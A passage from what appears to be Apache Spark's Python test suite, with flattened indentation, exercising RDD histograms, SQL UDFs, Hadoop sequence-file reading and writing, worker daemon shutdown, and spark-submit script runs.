# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
class TestSQL(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.sqlCtx = SQLContext(self.sc)
def test_udf(self):
self.sqlCtx.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.sqlCtx.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.sqlCtx.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.sqlCtx.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.sqlCtx.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_basic_functions(self):
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
srdd = self.sqlCtx.jsonRDD(rdd)
srdd.count()
srdd.collect()
srdd.schemaString()
srdd.schema()
# cache and checkpoint
self.assertFalse(srdd.is_cached)
srdd.persist()
srdd.unpersist()
srdd.cache()
self.assertTrue(srdd.is_cached)
self.assertFalse(srdd.isCheckpointed())
self.assertEqual(None, srdd.getCheckpointFile())
srdd = srdd.coalesce(2, True)
srdd = srdd.repartition(3)
srdd = srdd.distinct()
srdd.intersection(srdd)
self.assertEqual(2, srdd.count())
srdd.registerTempTable("temp")
srdd = self.sqlCtx.sql("select foo from temp")
srdd.count()
srdd.collect()
def test_distinct(self):
rdd = self.sc.parallelize(['{"a": 1}', '{"b": 2}', '{"c": 3}']*10, 10)
srdd = self.sqlCtx.jsonRDD(rdd)
self.assertEquals(srdd.getNumPartitions(), 10)
self.assertEquals(srdd.distinct().count(), 3)
result = srdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_apply_schema_to_row(self):
srdd = self.sqlCtx.jsonRDD(self.sc.parallelize(["""{"a":2}"""]))
srdd2 = self.sqlCtx.applySchema(srdd.map(lambda x: x), srdd.schema())
self.assertEqual(srdd.collect(), srdd2.collect())
rdd = self.sc.parallelize(range(10)).map(lambda x: Row(a=x))
srdd3 = self.sqlCtx.applySchema(rdd, srdd.schema())
self.assertEqual(10, srdd3.count())
class TestIO(PySparkTestCase):
def test_stdout_redirection(self):
import subprocess
def func(x):
subprocess.check_call('ls', shell=True)
self.sc.parallelize([1]).foreach(func)
class TestInputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
self.sc._jvm.WriteInputFormatTestDataGenerator.generateData(self.tempdir.name, self.sc._jsc)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.assertEqual(maps, em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
ec = (u'1',
{u'__class__': u'org.apache.spark.api.python.TestWritable',
u'double': 54.0, u'int': 123, u'str': u'test1'})
self.assertEqual(clazz[0], ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
batchSize=1).collect())
self.assertEqual(unbatched_clazz[0], ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
class TestOutputFormat(PySparkTestCase):
def setUp(self):
PySparkTestCase.setUp(self)
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
PySparkTestCase.tearDown(self)
shutil.rmtree(self.tempdir.name, ignore_errors=True)
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = sorted(self.sc.sequenceFile(basepath + "/sfmap/").collect())
self.assertEqual(maps, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = sorted(self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect())
self.assertEqual(result, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
old_dataset = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect())
self.assertEqual(old_dataset, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = zip(x, y)
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_unbatched_save_and_read(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei, numSlices=len(ei)).saveAsSequenceFile(
basepath + "/unbatched/")
unbatched_sequence = sorted(self.sc.sequenceFile(
basepath + "/unbatched/",
batchSize=1).collect())
self.assertEqual(unbatched_sequence, ei)
unbatched_hadoopFile = sorted(self.sc.hadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_hadoopFile, ei)
unbatched_newAPIHadoopFile = sorted(self.sc.newAPIHadoopFile(
basepath + "/unbatched/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopFile, ei)
oldconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_hadoopRDD = sorted(self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=oldconf,
batchSize=1).collect())
self.assertEqual(unbatched_hadoopRDD, ei)
newconf = {"mapred.input.dir": basepath + "/unbatched/"}
unbatched_newAPIHadoopRDD = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=newconf,
batchSize=1).collect())
self.assertEqual(unbatched_newAPIHadoopRDD, ei)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, numSlices=len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class TestDaemon(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shut down the worker

sock.send("\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
daemon = Popen([sys.executable, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class TestWorker(PySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
self.sc.parallelize(range(1)).foreach(sleep)
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
data = open(path).read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_fd_leak(self):
N = 1100 # fd limit is 1024 by default
rdd = self.sc.parallelize(range(N), N)
self.assertEquals(N, rdd.count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(range(100), 1)
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
class TestSparkSubmit(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
path = os.path.join(self.programDir, name + ".zip")
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
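# Illustrative note on the '|' convention used by the scripts below (the
# values here are hypothetical, not from the original source): a literal like
#     """
#     |print "hi"
#     """
# is stripped to the single line `print "hi"` before being written out.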
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out)
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out)
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(myfunc).collect()
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out)
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print sc.parallelize([1, 2, 3]).map(foo).collect()
""")
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,512]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
